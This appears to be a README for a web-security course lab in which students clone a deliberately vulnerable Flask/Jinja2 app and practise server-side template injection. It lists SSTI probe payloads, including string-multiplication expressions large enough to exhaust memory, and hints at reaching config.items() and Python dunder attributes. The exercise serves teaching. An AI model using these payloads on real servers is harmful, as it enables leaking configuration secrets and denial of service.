[BEW 2.3: Web Security] Clone this repo to begin the SSTI exploit activity.
- Create a new GitHub repo and name it
Jinja2-ExploitMe
- Clone the Make-School-Labs/Jinja2-ExploitMe repository
- Run
git remote rm origin
in your local copy - Replace it using your new GitHub URL:
git remote add origin https://github.com/YOUR_USERNAME/YOUR_REPO_NAME
- Run
export FLASK_ENV=development; flask run
to get started!
- {{3*4|string}}
- {{4|string*3}}
- {{4*[0]|join()}}
- {{[0]|join()*7}}
- {{[0]|join()*8**8}}
- {{[0]|join()*9**9}}
take a look at dylan's repo and deconstruct
- use two parameters
- access
config.items()
.__class__
etc- dunder methods
- structure to python